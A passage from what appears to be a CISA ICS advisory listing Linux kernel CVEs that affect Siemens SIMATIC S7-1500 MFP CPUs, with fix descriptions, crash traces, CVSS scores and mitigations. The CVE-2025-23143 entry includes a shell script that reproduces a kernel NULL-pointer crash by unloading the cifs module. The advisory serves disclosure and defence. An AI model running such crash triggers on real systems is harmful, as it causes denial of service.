<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22121</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: fix out-of-bound read in ext4_xattr_inode_dec_ref_all() There's issue as follows: BUG: KASAN: use-after-free in ext4_xattr_inode_dec_ref_all+0x6ff/0x790 Read of size 4 at addr ffff88807b003000 by task syz-executor.0/15172 CPU: 3 PID: 15172 Comm: syz-executor.0 Call Trace: __dump_stack lib/dump_stack.c:82 [inline] dump_stack+0xbe/0xfd lib/dump_stack.c:123 print_address_description.constprop.0+0x1e/0x280 mm/kasan/report.c:400 __kasan_report.cold+0x6c/0x84 mm/kasan/report.c:560 kasan_report+0x3a/0x50 mm/kasan/report.c:585 ext4_xattr_inode_dec_ref_all+0x6ff/0x790 fs/ext4/xattr.c:1137 ext4_xattr_delete_inode+0x4c7/0xda0 fs/ext4/xattr.c:2896 ext4_evict_inode+0xb3b/0x1670 fs/ext4/inode.c:323 evict+0x39f/0x880 fs/inode.c:622 iput_final fs/inode.c:1746 [inline] iput fs/inode.c:1772 [inline] iput+0x525/0x6c0 fs/inode.c:1758 ext4_orphan_cleanup fs/ext4/super.c:3298 [inline] ext4_fill_super+0x8c57/0xba40 fs/ext4/super.c:5300 mount_bdev+0x355/0x410 fs/super.c:1446 legacy_get_tree+0xfe/0x220 fs/fs_context.c:611 vfs_get_tree+0x8d/0x2f0 fs/super.c:1576 do_new_mount fs/namespace.c:2983 [inline] path_mount+0x119a/0x1ad0 fs/namespace.c:3316 do_mount+0xfc/0x110 fs/namespace.c:3329 __do_sys_mount fs/namespace.c:3540 [inline] __se_sys_mount+0x219/0x2e0 fs/namespace.c:3514 do_syscall_64+0x33/0x40 arch/x86/entry/common.c:46 entry_SYSCALL_64_after_hwframe+0x67/0xd1 Memory state around the buggy address: ffff88807b002f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff88807b002f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &gt;ffff88807b003000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ^ ffff88807b003080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ffff88807b003100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Above issue happens as ext4_xattr_delete_inode() isn't check xattr is valid if xattr is in inode. To solve above issue call xattr_check_inode() check if xattr if valid in inode. In fact, we can directly verify in ext4_iget_extra_inode(), so that there is no divergent verification.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22121">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-23136</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: thermal: int340x: Add NULL check for adev Not all devices have an ACPI companion fwnode, so adev might be NULL. This is similar to the commit cd2fd6eab480 ("platform/x86: int3472: Check for adev == NULL"). Add a check for adev not being set and return -ENODEV in that case to avoid a possible NULL pointer deref in int3402_thermal_probe(). Note, under the same directory, int3400_thermal_probe() has such a check. [ rjw: Subject edit, added Fixes: ]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-23136">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-23143</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: Fix null-ptr-deref by sock_lock_init_class_and_name() and rmmod. When I ran the repro [0] and waited a few seconds, I observed two LOCKDEP splats: a warning immediately followed by a null-ptr-deref. [1] Reproduction Steps: 1) Mount CIFS 2) Add an iptables rule to drop incoming FIN packets for CIFS 3) Unmount CIFS 4) Unload the CIFS module 5) Remove the iptables rule At step 3), the CIFS module calls sock_release() for the underlying TCP socket, and it returns quickly. However, the socket remains in FIN_WAIT_1 because incoming FIN packets are dropped. At this point, the module's refcnt is 0 while the socket is still alive, so the following rmmod command succeeds. # ss -tan State Recv-Q Send-Q Local Address:Port Peer Address:Port FIN-WAIT-1 0 477 10.0.2.15:51062 10.0.0.137:445 # lsmod | grep cifs cifs 1159168 0 This highlights a discrepancy between the lifetime of the CIFS module and the underlying TCP socket. Even after CIFS calls sock_release() and it returns, the TCP socket does not die immediately in order to close the connection gracefully. While this is generally fine, it causes an issue with LOCKDEP because CIFS assigns a different lock class to the TCP socket's sk-&gt;sk_lock using sock_lock_init_class_and_name(). Once an incoming packet is processed for the socket or a timer fires, sk-&gt;sk_lock is acquired. Then, LOCKDEP checks the lock context in check_wait_context(), where hlock_class() is called to retrieve the lock class. However, since the module has already been unloaded, hlock_class() logs a warning and returns NULL, triggering the null-ptr-deref. If LOCKDEP is enabled, we must ensure that a module calling sock_lock_init_class_and_name() (CIFS, NFS, etc) cannot be unloaded while such a socket is still alive to prevent this issue. Let's hold the module reference in sock_lock_init_class_and_name() and release it when the socket is freed in sk_prot_free(). Note that sock_lock_init() clears sk-&gt;sk_owner for svc_create_socket() that calls sock_lock_init_class_and_name() for a listening socket, which clones a socket by sk_clone_lock() without GFP_ZERO. [0]: CIFS_SERVER="10.0.0.137" CIFS_PATH="//${CIFS_SERVER}/Users/Administrator/Desktop/CIFS_TEST" DEV="enp0s3" CRED="/root/WindowsCredential.txt" MNT=$(mktemp -d /tmp/XXXXXX) mount -t cifs ${CIFS_PATH} ${MNT} -o vers=3.0,credentials=${CRED},cache=none,echo_interval=1 iptables -A INPUT -s ${CIFS_SERVER} -j DROP for i in $(seq 10); do umount ${MNT} rmmod cifs sleep 1 done rm -r ${MNT} iptables -D INPUT -s ${CIFS_SERVER} -j DROP [1]: DEBUG_LOCKS_WARN_ON(1) WARNING: CPU: 10 PID: 0 at kernel/locking/lockdep.c:234 hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223) Modules linked in: cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs] CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Not tainted 6.14.0 #36 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223) ... Call Trace: __lock_acquire (kernel/locking/lockdep.c:4853 kernel/locking/lockdep.c:5178) lock_acquire (kernel/locking/lockdep.c:469 kernel/locking/lockdep.c:5853 kernel/locking/lockdep.c:5816) _raw_spin_lock_nested (kernel/locking/spinlock.c:379) tcp_v4_rcv (./include/linux/skbuff.h:1678 ./include/net/tcp.h:2547 net/ipv4/tcp_ipv4.c:2350) ... BUG: kernel NULL pointer dereference, address: 00000000000000c4 PF: supervisor read access in kernel mode PF: error_code(0x0000) - not-present page PGD 0 Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Tainted: G W 6.14.0 #36 Tainted: [W]=WARN Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:__lock_acquire (kernel/ ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-23143">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37785</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ext4: fix OOB read when checking dotdot dir Mounting a corrupted filesystem with directory which contains '.' dir entry with rec_len == block size results in out-of-bounds read (later on, when the corrupted directory is removed). ext4_empty_dir() assumes every ext4 directory contains at least '.' and '..' as directory entries in the first data block. It first loads the '.' dir entry, performs sanity checks by calling ext4_check_dir_entry() and then uses its rec_len member to compute the location of '..' dir entry (in ext4_next_entry). It assumes the '..' dir entry fits into the same data block. If the rec_len of '.' is precisely one block (4KB), it slips through the sanity checks (it is considered the last directory entry in the data block) and leaves "struct ext4_dir_entry_2 *de" point exactly past the memory slot allocated to the data block. The following call to ext4_check_dir_entry() on new value of de then dereferences this pointer which results in out-of-bounds mem access. Fix this by extending __ext4_check_dir_entry() to check for '.' dir entries that reach the end of data block. Make sure to ignore the phony dir entries for checksum (by checking name_len for non-zero). Note: This is reported by KASAN as use-after-free in case another structure was recently freed from the slot past the bound, but it is really an OOB read. This issue was found by syzkaller tool. Call Trace: [ 38.594108] BUG: KASAN: slab-use-after-free in __ext4_check_dir_entry+0x67e/0x710 [ 38.594649] Read of size 2 at addr ffff88802b41a004 by task syz-executor/5375 [ 38.595158] [ 38.595288] CPU: 0 UID: 0 PID: 5375 Comm: syz-executor Not tainted 6.14.0-rc7 #1 [ 38.595298] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 38.595304] Call Trace: [ 38.595308] [ 38.595311] dump_stack_lvl+0xa7/0xd0 [ 38.595325] print_address_description.constprop.0+0x2c/0x3f0 [ 38.595339] ? __ext4_check_dir_entry+0x67e/0x710 [ 38.595349] print_report+0xaa/0x250 [ 38.595359] ? __ext4_check_dir_entry+0x67e/0x710 [ 38.595368] ? kasan_addr_to_slab+0x9/0x90 [ 38.595378] kasan_report+0xab/0xe0 [ 38.595389] ? __ext4_check_dir_entry+0x67e/0x710 [ 38.595400] __ext4_check_dir_entry+0x67e/0x710 [ 38.595410] ext4_empty_dir+0x465/0x990 [ 38.595421] ? __pfx_ext4_empty_dir+0x10/0x10 [ 38.595432] ext4_rmdir.part.0+0x29a/0xd10 [ 38.595441] ? __dquot_initialize+0x2a7/0xbf0 [ 38.595455] ? __pfx_ext4_rmdir.part.0+0x10/0x10 [ 38.595464] ? __pfx___dquot_initialize+0x10/0x10 [ 38.595478] ? down_write+0xdb/0x140 [ 38.595487] ? __pfx_down_write+0x10/0x10 [ 38.595497] ext4_rmdir+0xee/0x140 [ 38.595506] vfs_rmdir+0x209/0x670 [ 38.595517] ? lookup_one_qstr_excl+0x3b/0x190 [ 38.595529] do_rmdir+0x363/0x3c0 [ 38.595537] ? __pfx_do_rmdir+0x10/0x10 [ 38.595544] ? strncpy_from_user+0x1ff/0x2e0 [ 38.595561] __x64_sys_unlinkat+0xf0/0x130 [ 38.595570] do_syscall_64+0x5b/0x180 [ 38.595583] entry_SYSCALL_64_after_hwframe+0x76/0x7e</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37785">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37909</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: lan743x: Fix memleak issue when GSO enabled Always map the `skb` to the LS descriptor. Previously skb was mapped to EXT descriptor when the number of fragments is zero with GSO enabled. Mapping the skb to EXT descriptor prevents it from being freed, leading to a memory leak</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37909">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37917</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: ethernet: mtk-star-emac: fix spinlock recursion issues on rx/tx poll Use spin_lock_irqsave and spin_unlock_irqrestore instead of spin_lock and spin_unlock in mtk_star_emac driver to avoid spinlock recursion occurrence that can happen when enabling the DMA interrupts again in rx/tx poll. ``` BUG: spinlock recursion on CPU#0, swapper/0/0 lock: 0xffff00000db9cf20, .magic: dead4ead, .owner: swapper/0/0, .owner_cpu: 0 CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.15.0-rc2-next-20250417-00001-gf6a27738686c-dirty #28 PREEMPT Hardware name: MediaTek MT8365 Open Platform EVK (DT) Call trace: show_stack+0x18/0x24 (C) dump_stack_lvl+0x60/0x80 dump_stack+0x18/0x24 spin_dump+0x78/0x88 do_raw_spin_lock+0x11c/0x120 _raw_spin_lock+0x20/0x2c mtk_star_handle_irq+0xc0/0x22c [mtk_star_emac] __handle_irq_event_percpu+0x48/0x140 handle_irq_event+0x4c/0xb0 handle_fasteoi_irq+0xa0/0x1bc handle_irq_desc+0x34/0x58 generic_handle_domain_irq+0x1c/0x28 gic_handle_irq+0x4c/0x120 do_interrupt_handler+0x50/0x84 el1_interrupt+0x34/0x68 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x6c/0x70 regmap_mmio_read32le+0xc/0x20 (P) _regmap_bus_reg_read+0x6c/0xac _regmap_read+0x60/0xdc regmap_read+0x4c/0x80 mtk_star_rx_poll+0x2f4/0x39c [mtk_star_emac] __napi_poll+0x38/0x188 net_rx_action+0x164/0x2c0 handle_softirqs+0x100/0x244 __do_softirq+0x14/0x20 ____do_softirq+0x10/0x20 call_on_irq_stack+0x24/0x64 do_softirq_own_stack+0x1c/0x40 __irq_exit_rcu+0xd4/0x10c irq_exit_rcu+0x10/0x1c el1_interrupt+0x38/0x68 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x6c/0x70 cpuidle_enter_state+0xac/0x320 (P) cpuidle_enter+0x38/0x50 do_idle+0x1e4/0x260 cpu_startup_entry+0x34/0x3c rest_init+0xdc/0xe0 console_on_rootfs+0x0/0x6c __primary_switched+0x88/0x90 ```</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-37917">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-37945</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: phy: allow MDIO bus PM ops to start/stop state machine for phylink-controlled PHY DSA has 2 kinds of drivers: 1. Those who call dsa_switch_suspend() and dsa_switch_resume() from their device PM ops: qca8k-8xxx, bcm_sf2, microchip ksz 2. Those who don't: all others. The above methods should be optional. For type 1, dsa_switch_suspend() calls dsa_user_suspend() -&gt; phylink_stop(), and dsa_switch_resume() calls dsa_user_resume() -&gt; phylink_start(). These seem good candidates for setting mac_managed_pm = true because that is essentially its definition [1], but that does not seem to be the biggest problem for now, and is not what this change focuses on. Talking strictly about the 2nd category of DSA drivers here (which do not have MAC managed PM, meaning that for their attached PHYs, mdio_bus_phy_suspend() and mdio_bus_phy_resume() should run in full), I have noticed that the following warning from mdio_bus_phy_resume() is triggered: WARN_ON(phydev-&gt;state != PHY_HALTED &amp;&amp; phydev-&gt;state != PHY_READY &amp;&amp; phydev-&gt;state != PHY_UP); because the PHY state machine is running. It's running as a result of a previous dsa_user_open() -&gt; ... -&gt; phylink_start() -&gt; phy_start() having been initiated by the user. The previous mdio_bus_phy_suspend() was supposed to have called phy_stop_machine(), but it didn't. So this is why the PHY is in state PHY_NOLINK by the time mdio_bus_phy_resume() runs. mdio_bus_phy_suspend() did not call phy_stop_machine() because for phylink, the phydev-&gt;adjust_link function pointer is NULL. This seems a technicality introduced by commit fddd91016d16 ("phylib: fix PAL state machine restart on resume"). That commit was written before phylink existed, and was intended to avoid crashing with consumer drivers which don't use the PHY state machine - phylink always does, when using a PHY. But phylink itself has historically not been developed with suspend/resume in mind, and apparently not tested too much in that scenario, allowing this bug to exist unnoticed for so long. Plus, prior to the WARN_ON(), it would have likely been invisible. This issue is not in fact restricted to type 2 DSA drivers (according to the above ad-hoc classification), but can be extrapolated to any MAC driver with phylink and MDIO-bus-managed PHY PM ops. DSA is just where the issue was reported. Assuming mac_managed_pm is set correctly, a quick search indicates the following other drivers might be affected: $ grep -Zlr PHYLINK_NETDEV drivers/ | xargs -0 grep -L mac_managed_pm drivers/net/ethernet/atheros/ag71xx.c drivers/net/ethernet/microchip/sparx5/sparx5_main.c drivers/net/ethernet/microchip/lan966x/lan966x_main.c drivers/net/ethernet/freescale/dpaa2/dpaa2-mac.c drivers/net/ethernet/freescale/fs_enet/fs_enet-main.c drivers/net/ethernet/freescale/dpaa/dpaa_eth.c drivers/net/ethernet/freescale/ucc_geth.c drivers/net/ethernet/freescale/enetc/enetc_pf_common.c drivers/net/ethernet/marvell/mvpp2/mvpp2_main.c drivers/net/ethernet/marvell/mvneta.c drivers/net/ethernet/marvell/prestera/prestera_main.c drivers/net/ethernet/mediatek/mtk_eth_soc.c drivers/net/ethernet/altera/altera_tse_main.c 